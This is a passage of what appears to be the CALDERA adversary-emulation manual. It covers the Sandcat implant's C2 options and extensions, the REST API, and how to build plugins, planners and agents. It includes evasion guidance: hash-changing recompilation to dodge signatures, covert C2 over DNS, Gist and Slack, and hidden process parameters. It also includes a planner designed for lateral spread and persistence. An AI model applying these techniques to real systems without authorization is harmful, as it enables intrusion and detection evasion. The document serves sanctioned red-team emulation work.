- trait: host.archive.password
  value: C4ld3ra
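To illustrate the kind of transformation described above (simplified sketches; the exact escaping depends on which shell executes the ability):

```python
def bash_escape_dollars(password):
    """Sketch of bash-style escaping of '$' before the password is
    embedded in an archive command."""
    return password.replace("$", r"\$")

def powershell_escape_dollars(password):
    """PowerShell uses the backtick as its escape character."""
    return password.replace("$", "`$")
```

Either transformation turns Pa$$word into one of the decryption passwords mentioned above.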
22.7 Operation
TWENTYTHREE
WRAP-UP
That about does it! If you have any questions, please reach out to the team on Slack.
TWENTYFOUR
SANDCAT PLUGIN DETAILS
The Sandcat plugin provides CALDERA with its default agent implant, Sandcat. The agent is written in GoLang for
cross-platform compatibility and can currently be compiled to run on Windows, Linux, and MacOS targets.
While the CALDERA C2 server requires GoLang to be installed in order to compile agent binaries, no installation is
required on target machines - the agent program will simply run as an executable.
The sandcat plugin does come with precompiled binaries, but these only contain the basic agent features and are more
likely to be flagged by AV as they are publicly available on GitHub.
If you wish to dynamically compile agents to produce new hashes or include additional agent features, the C2 server
must have GoLang installed.
The source code for the sandcat agent is located in the gocat and gocat-extensions directories. gocat contains the
core agent code, which provides all of the basic features. gocat-extensions contains source code for extensions that
can be compiled into new agent binaries on demand. The extensions are kept separate to keep the agent lightweight
and to allow more flexibility when catering to various use cases.
Precompiled agent binaries are located in the payloads directory and are referenced with the following filenames:
• sandcat.go-darwin compiled binary for Mac targets
• sandcat.go-linux compiled binary for Linux targets
• sandcat.go-windows compiled binary for Windows targets.
These files get updated when dynamically compiling agents, so they will always contain the latest compiled version on
your system.
24.3 Deploy
To deploy Sandcat, use one of the built-in delivery commands from the main server GUI which allows you to run the
agent on Windows, Mac, or Linux.
Each of these commands downloads a compiled Sandcat executable from CALDERA and runs it immediately.
Once the agent is running, it should show log messages when it beacons into CALDERA.
If you have GoLang installed on the CALDERA server, each time you run one of the delivery commands
above, the agent will re-compile itself dynamically to obtain a new file hash. This will help bypass file-
based signature detections.
24.3.1 Options
When running the Sandcat agent binary, there are optional parameters you can use when you start the executable:
• -server [C2 endpoint]: This is the location (e.g. HTTP URL, IPv4:port string) that the agent will use to
reach the C2 server. (e.g. -server http://10.0.0.1:8888, -server 10.0.0.1:53, -server https://
example.com). The agent must have connectivity to this endpoint.
• -group [group name]: This is the group name that you would like the agent to join when it starts. The group
does not have to exist beforehand. A default group of red will be used if this option is not provided (e.g. -group
red, -group mygroup)
• -v: Toggle verbose output from sandcat. If this flag is not set, sandcat will run silently. This only applies to
output that would be displayed on the target machine, for instance if running sandcat from a terminal window.
This option does not affect the information that gets sent to the C2 server.
• -httpProxyGateway [gateway]: Sets the HTTP proxy gateway if running Sandcat in environments that use proxies to reach the internet.
• -paw [identifier]: Optionally assign the agent with an identifier value. By default, the agent will be assigned
a random identifier by the C2 server.
• -c2 [C2 method name]: Instruct the agent to connect to the C2 server using the given C2 communication
method. By default, the agent will use HTTP(S). The following C2 channels are currently supported:
– HTTP(S) (-c2 HTTP, or simply exclude the c2 option)
– DNS Tunneling (-c2 DnsTunneling): requires the agent to be compiled with the DNS tunneling extension.
– FTP (-c2 FTP): requires the agent to be compiled with the FTP extension
– Github GIST (-c2 GIST): requires the agent to be compiled with the Github Gist extension
– Slack (-c2 Slack): requires the agent to be compiled with the Slack extension
– SMB Pipes (-c2 SmbPipe): allows the agent to connect to another agent peer via SMB pipes to route
traffic through an agent proxy to the C2 server. Cannot be used to connect directly to the C2. Requires the
agent to be compiled with the proxy_smb_pipe SMB pipe extension.
• -delay [number of seconds]: pause the agent for the specified number of seconds before running
• -listenP2P: Toggle peer-to-peer listening mode. When enabled, the agent will listen for and accept peer-to-peer
connections from other agents. This feature can be leveraged in environments where users want agents within
an internal network to proxy through another agent in order to connect to the C2 server.
• -originLinkID [link ID]: associates the agent with the operation instruction with the given link ID. This allows the C2 server to map out lateral movement by determining which operation instructions spawned which agents.
Additionally, the sandcat agent can tunnel its communications to the C2 using the tunneling options shown earlier (-tunnelProtocol, -tunnelAddr, -tunnelUser, -tunnelPassword); for more details, see the C2 tunneling documentation.
24.4 Extensions
In order to keep the agent code lightweight, the default Sandcat agent binary ships with limited basic functionality.
Users can dynamically compile additional features, referred to as “gocat extensions”. Each extension is temporarily
added to the existing core sandcat code to provide functionality such as peer-to-peer proxy implementations, additional
executors, and additional C2 communication protocols.
To request particular extensions, users must include the gocat-extensions HTTP header when asking the C2 to
compile an agent. The header value must be a comma-separated list of requested extensions. The server will include
the extensions in the binary if they exist and if their dependencies are met (i.e. if the extension requires a particular
GoLang module that is not installed on the server, then the extension will not be included).
Below is an example PowerShell snippet to request the C2 server to include the proxy_http and shells extensions:
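As a sketch of such a request, shown here in Python rather than PowerShell (the file, platform, and gocat-extensions header names follow the download examples elsewhere in this document; the server address is a placeholder):

```python
import urllib.request

def compile_request(server, platform, extensions):
    """Build the /file/download request asking the C2 to compile an
    agent with the given gocat extensions."""
    req = urllib.request.Request(f"{server}/file/download", method="POST")
    req.add_header("file", "sandcat.go")
    req.add_header("platform", platform)
    # the header value is a comma-separated list of requested extensions
    req.add_header("gocat-extensions", ",".join(extensions))
    return req

req = compile_request("http://192.168.140.1:8888", "windows",
                      ["proxy_http", "shells"])
```

If an extension's dependencies are not met on the server, it is simply left out of the compiled binary.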
C2 Communication Extensions
• ftp: provides the FTP C2 communication protocol. Requires the following GoLang module:
– github.com/jlaffaye/ftp
• slack: provides the Slack C2 communication protocol.
• proxy_http: allows the agent to accept peer-to-peer messages via HTTP. Not required if the agent is simply using HTTP to connect to a peer (acts the same as connecting directly to the C2 server over HTTP).
• proxy_smb_pipe: provides the SmbPipe peer-to-peer proxy client and receiver for Windows (peer-to-peer com-
munication via SMB named pipes).
– Requires the gopkg.in/natefinch/npipe.v2 GoLang module
Executor Extensions
• shells: provides the osascript (Mac osascript), pwsh (Windows PowerShell Core), and Python (python2 and python3) executors.
• shellcode: provides the shellcode executors.
• native: provides basic native execution functionality, which leverages GoLang code to perform tasks rather
than calling external binaries or commands.
• native_aws: provides native execution functionality specific to AWS. Does not require the native extension,
but does require the following GoLang modules:
– github.com/aws/aws-sdk-go
– github.com/aws/aws-sdk-go/aws
• donut: provides the Donut functionality to execute certain .NET executables in memory. See
https://github.com/TheWover/donut for additional information.
Other Extensions
• shared: provides the C-sharing functionality for Sandcat. This can be used to compile Sandcat as a DLL rather than a .exe for Windows targets.
24.5 Customizing Default Options & Execution Without CLI Options
It is possible to customize the default values of these options when pulling Sandcat from the CALDERA server. This is useful if you want to hide the parameters from the process tree or if you cannot specify arguments when executing the agent binary.
You can do this by passing the values in as headers when requesting the agent binary from the C2 server instead of as
parameters when executing the binary.
The following parameters can be specified this way:
• server
• group
• listenP2P
For example, the following will download a linux executable that will use http://10.0.0.2:8888 as the server
address instead of http://localhost:8888, will set the group name to mygroup instead of the default red, and will
enable the P2P listener:
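A sketch of that request, rendered as the curl command it corresponds to (the helper is hypothetical; the server, group, and listenP2P header names are the parameters listed above):

```python
def agent_download_cmd(c2, platform, overrides):
    """Render a curl command that downloads an agent binary while
    overriding compiled-in defaults via HTTP headers instead of
    command-line flags."""
    headers = {"file": "sandcat.go", "platform": platform, **overrides}
    flags = " ".join(f'-H "{k}:{v}"' for k, v in headers.items())
    return f"curl -s -X POST {flags} {c2}/file/download > sandcat.go"

cmd = agent_download_cmd(
    "http://localhost:8888", "linux",
    {"server": "http://10.0.0.2:8888", "group": "mygroup", "listenP2P": "true"},
)
```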
Additionally, if you want the C2 server to compile the agent with a built-in list of known peers (agents that are actively
listening for peer-to-peer requests), you can do so with the following header:
• includeProxyPeers. Example usage:
– includeProxyPeers:all - include all peers, regardless of which proxy methods they are listening on
– includeProxyPeers:SmbPipe - only include peers listening for SMB pipe proxy traffic
– includeProxyPeers:HTTP - only include peers listening for HTTP proxy traffic.
The following section contains information intended to help developers understand the inner workings of the
CALDERA adversary emulation tool, CALDERA plugins, or new tools that interface with the CALDERA server.
TWENTYFIVE
THE REST API
Note: The original REST API has been deprecated. The new REST API v2 has been released, with documentation
available here after server startup. Alternatively, this can be viewed by scrolling to the bottom of the CALDERA
navigation menu and selecting “api docs.”
All REST API functionality can be viewed in the rest_api.py module in the source code.
25.1 /api/rest
You can interact with all parts of CALDERA through the core REST API endpoint /api/rest. If you send requests to localhost, you are not required to pass a key header. If you send requests to 127.0.0.1 or any other IP address, the key header is required. You can set the API key in the conf/default.yml file. Accordingly, some of the examples below include the header and others do not.
Any request to this endpoint must include an “index” as part of the request, which routes it to the appropriate
object type.
Here are the available REST API functions:
25.2 Agents
25.2.1 DELETE
25.2.2 POST
You can optionally POST an obfuscator and/or a facts dictionary with key/value pairs to fill in any variables
the chosen ability requires.
{"paw":"$PAW","ability_id":"$ABILITY_ID","obfuscator":"base64","facts":[{"name":"username
˓→","value":"admin"},{"name":"password", "value":"123"}]}
25.3 Adversaries
View all abilities for a specific adversary_id (the UUID of the adversary).
25.4 Operations
25.4.1 DELETE
25.4.2 POST
Change the state of any operation. In addition to finished, you can also use: paused, run_one_link or running.
25.4.3 PUT
Create a new operation. All that is required is the operation name, similar to creating a new operation in the browser.
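A sketch of such a request (the KEY header name, the PUT method, and the exact payload shape are assumptions based on the descriptions above):

```python
import json
import urllib.request

def rest_request(index, data=None, api_key=None):
    """Build a request to the core /api/rest endpoint. Every request
    must carry an 'index' routing it to the right object type."""
    payload = {"index": index, **(data or {})}
    req = urllib.request.Request(
        "http://127.0.0.1:8888/api/rest",
        data=json.dumps(payload).encode(),
        method="PUT",
    )
    if api_key:               # required when not targeting localhost
        req.add_header("KEY", api_key)
    return req

# create a new operation; only the name is required
req = rest_request("operations", {"name": "my-operation"}, api_key="ADMIN123")
```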
25.5 /file/upload
Files can be uploaded to CALDERA by POST’ing a file to the /file/upload endpoint. Uploaded files will be put in the
exfil_dir location specified in the default.yml file.
25.5.1 Example
25.6 /file/download
Files can be downloaded from CALDERA through the /file/download endpoint. This endpoint requires an HTTP header called "file" with the file name as the value. When a file is requested, CALDERA will look inside each of the payload directories listed in the local.yml file until it finds a file matching the name.
Files can also be downloaded indirectly through the payload block of an ability.
Additionally, the Sandcat plugin delivery commands utilize the file download endpoint to drop the agent on a host.
25.6.1 Example
TWENTYSIX
HOW TO BUILD PLUGINS
Building your own plugin allows you to add custom functionality to CALDERA.
A plugin can be nearly anything, from a RAT/agent (like Sandcat) to a new GUI or a collection of abilities that you
want to keep in “closed-source”.
Plugins are stored in the plugins directory. If a plugin is also listed in the local.yml file, it will be loaded into CALDERA
each time the server starts. A plugin is loaded through its hook.py file, which is “hooked” into the core system via the
server.py (main) module.
When constructing your own plugins, you should avoid importing modules from the core code base, as
these can change. There are two exceptions to this rule:
1. The services dict() passed to each plugin can be used freely. Only utilize the public functions on
these services, however. These functions will be defined on the services' corresponding interface.
2. Any c_object that implements the FirstClassObjectInterface. Only call the functions on this interface,
as the others are subject to change.
This guide is useful as it covers how to create a simple plugin from scratch. However, if this is old news to you and
you’re looking for an even faster start, consider trying out Skeleton (a plugin for building other plugins). Skeleton will
generate a new plugin directory that contains all the standard boilerplate.
Start by creating a new directory called “abilities” in CALDERA’s plugins directory. In this directory, create a hook.py
file and ensure it looks like this:
name = 'Abilities'
description = 'A sample plugin for demonstration purposes'
address = None
The name should always be a single word, the description a phrase, and the address should be None, unless your plugin
exposes new GUI pages. Our example plugin will be called “abilities”.
The enable function is what gets hooked into CALDERA at boot time. This function accepts one parameter:
1. services: a list of core services that CALDERA creates at boot time, which allow you to interact with the core
system in a safe manner.
Core services can be found in the app/services directory.
Now it’s time to fill in your own enable function. Let’s start by appending a new REST API endpoint to the server.
When this endpoint is hit, we will direct the request to a new class (AbilityFetcher) and function (get_abilities). The
full hook.py file now looks like:
from aiohttp import web

name = 'Abilities'
description = 'A sample plugin for demonstration purposes'
address = None

async def enable(services):
    # Hooked into CALDERA at boot; registers the new REST endpoint
    app = services.get('app_svc').application
    fetcher = AbilityFetcher(services)
    app.router.add_route('GET', '/get/abilities', fetcher.get_abilities)

class AbilityFetcher:

    def __init__(self, services):
        self.services = services

    async def get_abilities(self, request):
        abilities = await self.services.get('data_svc').locate('abilities')
        return web.json_response(dict(abilities=[a.display for a in abilities]))
Now that our enable function is filled in, let's add the plugin to the default.yml file and restart CALDERA. Once
running, in a browser or via cURL, navigate to 127.0.0.1:8888/get/abilities. If all worked, you should get a JSON
response back, with all the abilities within CALDERA.
Now we have a usable plugin, but we want to make it more visually appealing.
Start by creating a “templates” directory inside your plugin directory (abilities). Inside the templates directory, create
a new file called abilities.html. Ensure the content looks like:
<h1 style="font-size:70px;margin-top:-20px;">Abilities</h1>
</div>
<div class="column" style="flex:75%;padding:15px;text-align: left">
<div>
{% for a in abilities %}
<pre style="color:grey">{{ a }}</pre>
<hr>
{% endfor %}
</div>
</div>
</div>
</div>
Then, back in your hook.py file, let’s fill in the address variable and ensure we return the new abilities.html page when
a user requests 127.0.0.1/get/abilities. Here is the full hook.py:
from aiohttp import web
from aiohttp_jinja2 import template
from app.service.auth_svc import check_authorization

name = 'Abilities'
description = 'A sample plugin for demonstration purposes'
address = '/plugin/abilities/gui'

async def enable(services):
    # Registers both the JSON endpoint and the new GUI page
    app = services.get('app_svc').application
    fetcher = AbilityFetcher(services)
    app.router.add_route('GET', '/get/abilities', fetcher.get_abilities)
    app.router.add_route('GET', address, fetcher.splash)

class AbilityFetcher:

    def __init__(self, services):
        self.services = services
        self.auth_svc = services.get('auth_svc')

    async def get_abilities(self, request):
        abilities = await self.services.get('data_svc').locate('abilities')
        return web.json_response(dict(abilities=[a.display for a in abilities]))

    @check_authorization
    @template('abilities.html')
    async def splash(self, request):
        abilities = await self.services.get('data_svc').locate('abilities')
        return dict(abilities=[a.display for a in abilities])
Restart CALDERA and navigate to the home page. Be sure to run server.py with the --fresh flag to flush the
previous object store database.
You should see a new “abilities” tab at the top, clicking on this should navigate you to the new abilities.html page you
created.
Any Markdown or reStructured text in the plugin’s docs/ directory will appear in the documentation generated by the
fieldmanual plugin. Any resources, such as images and videos, will be added as well.
27 How to Build Planners
Any planner decision logic not encapsulated in the default batch planner (or any other existing planner) requires
implementing a new planner to encode that logic.
27.1 Buckets
How planners make decisions is centered on a concept we call 'buckets'. Buckets denote the planner's
state machine and are intended to correspond to buckets (groups) of CALDERA abilities. Within a planner, macro-level
decision control is encoded by specifying which buckets (i.e. states) follow other buckets, thus forming a bucket state
machine. Micro-level decisions are made within the buckets, by specifying any logic detailing which abilities to send
to agents and when to do so.
CALDERA abilities are also tagged by the buckets they are in. By default, when abilities are loaded by CALDERA, they
are tagged with the bucket of the ATT&CK tactic they belong to. CALDERA abilities can also be tagged or untagged
by any planner, before starting the operation or at any point during it. The intent is for buckets to work with
the abilities that have been tagged for that bucket, but this is by no means enforced.
Let’s dive into creating a planner to see the power and flexibility of the CALDERA planner component. For this
example, we will implement a planner that will carry out the following state machine:
The planner will consist of 5 buckets: Privilege Escalation, Collection, Persistence, Discovery, and Lateral Movement.
As implied by the state machine, this planner will use the underlying adversary abilities to attempt to spread to as
many hosts as possible and establish persistence. As an additional feature, if an agent cannot obtain persistence due to
unsuccessful privilege escalation attempts, then the agent will execute collection abilities immediately in case it loses
access to the host.
This document will walk through creating three basic components of a planner module (initialization, entrypoint
method, and bucket methods), creating the planner data object, and applying the planner to a new operation.
We will create a python module called privileged_persistence.py and nest it under app/ in the mitre/
stockpile plugin at plugins/stockpile/app/privileged_persistence.py.
First, let's build the static initialization of the planner:
class LogicalPlanner:

    def __init__(self, operation, planning_svc, stopping_conditions=()):
        self.operation = operation
        self.planning_svc = planning_svc
        self.stopping_conditions = stopping_conditions
        self.stopping_condition_met = False
        self.state_machine = ['privilege_escalation', 'persistence', 'collection',
                              'discovery', 'lateral_movement']
        self.next_bucket = 'privilege_escalation'
The __init__() method for a planner must take and store the required arguments for the operation instance,
planning_svc handle, and any supplied stopping_conditions.
Additionally, self.stopping_condition_met, which is used to control when to stop bucket execution, is initially
set to False. During bucket execution, this property will be set to True if any facts gathered by the operation exactly
match (both name and value) any of the facts provided in stopping_conditions. When this occurs, the operation
will stop running new abilities.
The self.state_machine variable is an optional list enumerating the baseline order of the planner state machine.
This ordered list does not control the bucket execution order, but is used to define a baseline state machine that we
can refer back to in our decision logic. This will be demonstrated in our example below when we create the bucket
methods.
self.next_bucket = 'privilege_escalation'
The self.next_bucket variable holds the next bucket to be executed. This is the next bucket that the planner will
enter and whose bucket method will next control the planning logic. Initially, we set self.next_bucket to the first
bucket the planner will begin in. We will modify self.next_bucket from within our bucket methods in order to
specify the next bucket to execute.
Additional Planner class variables
It is also important to note that a planner may define any required variables that it may need. For instance, many custom
planners require information to be passed from one bucket to another during execution. This can be done by creating
class variables to store information which can be accessed within any bucket method and will persist between bucket
transitions.
Now, let's define the planner's entrypoint method: execute.
execute is where the planner starts and where any runtime initialization is done. execute_planner (the planning
service utility that drives the planner) works by executing the bucket specified by self.next_bucket until the
self.stopping_condition_met variable is set to True.
For our planner, no further runtime initialization is required in the execute method.
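A minimal entrypoint can simply delegate to the planning service; the delegation to execute_planner below follows the description above, but the exact call is an assumption:

```python
class LogicalPlanner:
    # __init__ as shown earlier ...

    async def execute(self):
        # Hand control to the planning service, which repeatedly runs the
        # bucket named by self.next_bucket until stopping_condition_met
        # becomes True (assumed utility; check your planning service).
        await self.planning_svc.execute_planner(self)
```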
Finally, let's create our bucket methods. The key decision points inside them look like this:
if successful:
    self.next_bucket = 'persistence'
else:
    self.next_bucket = 'collection'
and:
if lateral_movement_unlocked:
    self.next_bucket = await self.planning_svc.default_next_bucket('discovery', self.state_machine)
else:
    # planner will transition from this bucket to being done
    self.next_bucket = None
These bucket methods are where all inter-bucket transitions and intra-bucket logic will be encoded. For every bucket
in our planner state machine, we must define a corresponding bucket method.
Let's look at each of the bucket methods in detail:
• privilege_escalation() - We first use get_links planning service utility to retrieve all abilities (links)
tagged as privilege escalation from the operation adversary. We then push these links to the agent with apply
and wait for these links to complete with wait_for_links_completion(), both from the operation utility.
After the links complete, we check for the creation of custom facts that indicate the privilege escalation was
successful (Note: this assumes the privilege escalation abilities we are using create custom facts in the format
“{paw}.privilege.root” or “{paw}.privilege.admin” with values of True or False). If privilege escalation was
successful, set the next bucket to be executed to persistence, otherwise collection.
• persistence(), collection(), lateral_movement() - These buckets have no complex logic; we just want
to execute all available links that are tagged for the given bucket. We can use the exhaust_bucket() planning
service utility to apply all links for the given bucket tag. Before exiting, we set the next bucket as desired. Note
that in the persistence() bucket we use the default_next_bucket() planning service utility, which will
automatically choose the next bucket after "persistence" in the provided self.state_machine ordered list.
• discovery() - This bucket starts by running all discovery ability links available. Then we utilize a useful trick
to determine if the planner should proceed to the lateral movement bucket. We use get_links() to determine
if the discovery links that were just executed ended up unlocking ability links for lateral movement. From there
we set the next bucket accordingly.
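For illustration, the persistence bucket described above could be sketched as follows; the utility names come from the text, but the exact signatures are assumptions:

```python
class LogicalPlanner:
    # ... __init__ and the other buckets as described above ...

    async def persistence(self):
        # Run every ability link tagged for the 'persistence' bucket
        # (exhaust_bucket signature assumed).
        await self.planning_svc.exhaust_bucket(self, 'persistence', self.operation)
        # Follow the baseline state machine to the bucket after 'persistence'.
        self.next_bucket = await self.planning_svc.default_next_bucket(
            'persistence', self.state_machine)
```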
Additional Notes on Privileged Persistence Planner
• You may have noticed that the privileged_persistence planner is only notionally more sophisticated than running
certain default adversary profiles. This is correct. If you can find or create an adversary profile whose ability
enumeration (i.e. order) can carry out your desired operational progression between abilities and can be executed
in batch (by the default batch planner) or in a sequentially atomic order (by the atomic planner), it is advised to
go that route. However, any decision logic beyond those simple planners will have to be implemented in a new
planner.
• The privileged persistence planner did not have explicit logic to handle multiple agents. We just assumed the
planner buckets would only have to handle a single active agent given the available ability links returned from
the planning service.
In order to use this planner inside CALDERA, we will create the following YAML file at plugins/stockpile/data/
planners/80efdb6c-bb82-4f16-92ae-6f9d855bfb0e.yml:
---
id: 80efdb6c-bb82-4f16-92ae-6f9d855bfb0e
name: privileged_persistence
description: |
  Privileged Persistence Planner: Attempt to spread to as many hosts as
  possible and establish persistence.
module: plugins.stockpile.app.privileged_persistence
This will create a planner in CALDERA which will call the module we’ve created at plugins.stockpile.app.
privileged_persistence.
NOTE: For planners intended to be used with profiles containing repeatable abilities,
allow_repeatable_abilities: True must be added to the planner YAML file. Otherwise, CALDERA
will default the value to False and assume the planner does not support repeatable abilities.
To use the planner, create an Operation and select the “Use privileged_persistence planner” option in the planner
dropdown (under Autonomous). Any selected planner will use the abilities in the selected adversary profile during the
operation. Since abilities are automatically added to buckets which correlate to MITRE ATT&CK tactics, any abilities
with the following tactics will be executed by the privileged_persistence planner: privilege_escalation, persistence,
collection, discovery, and lateral_movement.
Custom planners are not required to use the buckets approach in order to work with the CALDERA operation interface.
Here is a minimal planner that will still work with the operation interface:
class LogicalPlanner:

    def __init__(self, operation, planning_svc, stopping_conditions=()):
        self.operation = operation
        self.planning_svc = planning_svc
        self.stopping_conditions = stopping_conditions
        self.stopping_condition_met = False

    async def execute(self):
        # Minimal logic: push every available link to the agents and wait
        # (body reconstructed from the operation utilities described below).
        links = await self.planning_svc.get_links(self.operation)
        link_ids = [await self.operation.apply(link) for link in links]
        await self.operation.wait_for_links_completion(link_ids)
In addition to the basic (name, value) information present in facts and documented in Basic Usage, there are some
additional fields that may prove useful when developing and working with planners.
As of Caldera v4.0, facts now have the new origin_type and source fields, which identify how Caldera learned that
fact. There are 5 possible values for the origin_type field:
• DOMAIN - This fact originates from Caldera’s general knowledge about environments
• SEEDED - This fact originates from a source file, which was used to seed an operation
• LEARNED - This fact originates from an operation, which uncovered it
• IMPORTED - This fact originates from a previous operation, or another pre-existing fact collection
• USER - This fact originates from a User, i.e. was entered through the GUI
The source field, on the other hand, contains a UUID4 that corresponds to the originating object described by
origin_type.
As of Caldera v4.0, facts also now have new fields that track the Links and Relationships that have contributed
to that fact in some way, accessible as links and relationships respectively. Each of these properties is
a list of corresponding objects, with links corresponding to all Link objects that generated/identified this Fact, and
relationships corresponding to all Relationship objects that reference this Fact.
One potentially useful Fact property for planners is the score property. This tracks how many times a fact has been
used successfully in links, allowing facts to have an inherent ‘weight’ to them when they are useful. Facts start with a
score of 1, a value that typically increases by 1 every time a link uses it (though scores can be increased or decreased
by varying amounts by other means). For context, a link’s score, when generated by Caldera’s core planning services,
is simply the sum of the scores of the facts utilized by that link.
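The scoring rule can be made concrete with a small sketch; the Fact class below is a stand-in for illustration, not Caldera's own:

```python
from dataclasses import dataclass

@dataclass
class Fact:
    name: str
    value: str
    score: int = 1  # facts start at 1 and typically gain 1 per successful use

def link_score(facts):
    # A link's score is the sum of the scores of the facts it uses.
    return sum(f.score for f in facts)

facts = [Fact('host.user.name', 'admin', score=3),
         Fact('host.user.password', 'hunter2')]
print(link_score(facts))  # → 4
```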
Within a planner, all public utilities are available from self.operation. The following may assist in planner
development:
• apply() - Add a link to the operation.
• wait_for_links_completion() - Wait for started links to be completed.
• all_facts() - Return a list of all facts collected during an operation. These will include both learned and
seeded (from the operation source) facts.
• has_fact() - Search an operation for a fact with a particular name and value.
• all_relationships() - Return a list of all relationships collected during an operation.
• active_agents() - Find all agents in the operation that have been active since operation start.
As of Caldera V4.0, a new service has been added to the core of Caldera for use with planners and other components
that make use of facts: the Knowledge Service. This service allows the creation, retrieval, updating, and deletion of
facts, relationships, and rules. Typically, users should not need to interact with this service directly, as common usage
patterns are already baked into core objects such as Link, Agent, and Operation, but the service can be accessed by
using BaseService.get_service('knowledge_svc'), should the need arise for more complex interactions with
the available data. The Knowledge Service stores data persistently in the same manner that Caldera’s internal Data
Service does (by writing it to a file on shutdown), and can be cleared in much the same way if necessary (by using the
--fresh argument on the server).
The following methods are available from the Knowledge Service:
app.objects.secondclass.c_fact
• KnowledgeService.add_fact(fact) - Add a fact to the Knowledge Service’s datastore. The fact argument
must be an already instantiated Fact() object.
• KnowledgeService.delete_fact(criteria) - Remove matching facts from the datastore. The criteria
argument should be a dictionary with fields to match existing facts against for selection.
• KnowledgeService.get_facts(criteria) - Retrieve matching facts from the datastore. The criteria
argument should be a dictionary with fields to match existing facts against for selection.
• KnowledgeService.update_fact(criteria, updates) - Update an existing fact in the datastore. The
criteria argument should be a dictionary with fields to match existing facts against for selection, and updates
should be a dictionary with fields to change and their new values.
• KnowledgeService.get_fact_origin(fact) - Identify the location/source of a provided fact. The fact
argument can be either a name to search for or a full-blown Fact object. The return value is a tuple of the ID
corresponding to the origin object for this fact and the type of origin object.
app.objects.secondclass.c_relationship
app.objects.secondclass.c_rule
• KnowledgeService.add_rule(rule) - Add a rule to the datastore. The rule argument must be an already
existing Rule() object.
• KnowledgeService.delete_rule(criteria) - Remove a rule from the datastore. The criteria argument
should be a dictionary containing fields and values to match existing rules against.
• KnowledgeService.get_rules(criteria) - Retrieve matching rules from the datastore. The criteria
argument should be a dictionary containing fields to match existing rules against.
All objects added to the Knowledge Service are checked against existing objects in order to enforce de-duplication,
with one caveat: because origin is tracked for facts generated by links in the current implementation, duplicate
facts created during different operations can exist in the fact store simultaneously. Facts/Relationships are usually
automatically added to the fact store by Link objects as part of the process of parsing output, though they can be added
manually should the need arise.
28 How to Build Agents
Building your own agent is a way to create a unique - or undetectable - footprint on compromised machines. Our default
agent, Sandcat, is a representation of what an agent can do. This agent is written in GoLang and offers an extensible
collection of command-and-control (C2) protocols, such as communicating over HTTP or GitHub Gist.
You can extend Sandcat by adding your own C2 protocols in place or you can follow this guide to create your own agent
from scratch.
Agents are processes which are deployed on compromised hosts and connect with the C2 server periodically for
instructions. An agent connects to the server through a contact, which is a specific connection point on the server.
Each contact is defined in an independent Python module and is registered with the contact_svc when the server starts.
There are currently several built-in contacts available: http, tcp, udp, websocket, gist (via Github), and dns.
For additional stealth, supporting agents can use communication tunnels to tunnel built-in contacts like HTTP, TCP,
and UDP. For more information on C2 communication tunneling, see the C2 tunneling section.
Start by getting a feel for the HTTP endpoints, which are located in the contacts/contact_http.py module.
POST /beacon
28.2.1 Part #1
• group: Either red or blue. This determines if your agent will be used as a red or blue agent.
• paw: The current unique identifier for the agent, either initially generated by the agent itself or provided by the
C2 on initial beacon.
• username: The username running the agent
• architecture: The architecture of the host
• executors: A list of executors allowed on the host
• privilege: The privilege level of the agent process, either User or Elevated
• pid: The process identifier of the agent
• ppid: The process identifier of the agent’s parent process
• location: The location of the agent on disk
• exe_name: The name of the agent binary file
• host_ip_addrs: A list of valid IPv4 addresses on the host
• proxy_receivers: a dict (key: string, value: list of strings) that maps a peer-to-peer proxy protocol name to a list
of addresses that the agent is listening on for peer-to-peer client requests.
• deadman_enabled: a boolean that tells the C2 server whether or not this agent supports deadman abilities. If
this value is not provided, the server assumes that the agent does not support deadman abilities.
• upstream_dest: The “next hop” upstream destination address (e.g. IP or FQDN) that the agent uses to reach
the C2 server. If the agent is using peer-to-peer communication to reach the C2, this value will contain the peer
address rather than the C2 address.
At this point, you are ready to make a POST request with the profile to the /beacon endpoint. You should get back:
1) The recommended number of seconds to sleep before sending the next beacon
2) The recommended number of seconds (watchdog) to wait before killing the agent, once the server is unreachable
(0 means infinite)
3) A list of instructions - base64 encoded.
profile=$(echo '{"server":"http://127.0.0.1:8888","platform":"darwin","executors":["sh"]}' | base64)
If you get a malformed base64 error, that means the operating system you are using is inserting a line break into the
profile variable. You can verify this by running:
echo $profile
To resolve this error, simply change the line to (note the only difference is '-w 0'):
profile=$(echo '{"server":"http://127.0.0.1:8888","platform":"darwin","executors":["sh"]}' | base64 -w 0)
The paw property returned back from the server represents a unique identifier for your new agent. Each
time you call the /beacon endpoint without this paw, a new agent will be created on the server - so you
should ensure that future beacons include it.
You can now navigate to the CALDERA UI, click into the agents tab and view your new agent.
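The same beacon flow can be sketched in Python, assuming the default HTTP contact on port 8888; the network call is left commented out since it needs a running server:

```python
import base64
import json
import urllib.request

def encode_profile(profile):
    # The /beacon endpoint expects the JSON profile base64-encoded with no
    # trailing newline (the equivalent of `base64 -w 0`).
    return base64.b64encode(json.dumps(profile).encode())

def beacon(server='http://127.0.0.1:8888'):
    profile = {'server': server, 'platform': 'darwin', 'executors': ['sh']}
    request = urllib.request.Request(url=server + '/beacon',
                                     data=encode_profile(profile),
                                     method='POST')
    with urllib.request.urlopen(request) as response:
        # The body is base64-encoded JSON: sleep, watchdog, paw, instructions
        return json.loads(base64.b64decode(response.read()))

# decoded = beacon()  # uncomment with a running CALDERA server
```

Remember to include the paw returned by the first beacon in every subsequent profile, or the server will register a new agent each time.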
28.2.2 Part #2
28.2.3 Part #3
Inside each instruction, there is an optional payload property that contains a filename of a file to download before
running the instruction. To implement this, add a file download capability to your agent, directing it to the /file/download
endpoint to retrieve the file:
payload='some_file_name.txt'
curl -X POST -H "file:$payload" http://localhost:8888/file/download > some_file_name.txt
28.2.4 Part #4
Inside each instruction, there is an optional uploads property that contains a list of filenames to upload to the C2 after
running the instruction and submitting the execution results. To implement this, add a file upload capability to your
agent. If using the HTTP contact, the file upload should hit the /file/upload endpoint of the server.
28.2.5 Part #5
You should implement the watchdog configuration. This property, passed to the agent in every beacon, contains the
number of seconds to allow a dead beacon before killing the agent.
Additionally, you may want to take advantage of CALDERA's lateral movement tracking capabilities. CALDERA's
current implementation for tracking lateral movement depends on passing the ID of the Link that spawns the agent as
an argument to the agent's spawn command, and on the agent returning this Link ID as part of its profile when it
checks in. The following section explains how lateral movement tracking has been enabled for the default agent,
Sandcat.
28.3.1 Sandcat
An example Sandcat spawn command has been copied from the Service Creation ability and included below for
reference:
If the CALDERA server is running on http://192.168.0.1:8888 and the ID of the Link with the spawn command
is cd63fdbb-0f3a-49ea-b4eb-306a3ff40f81, the populated command will appear as:
The Sandcat agent stores the value of this global variable in its profile, which is then returned to the CALDERA server
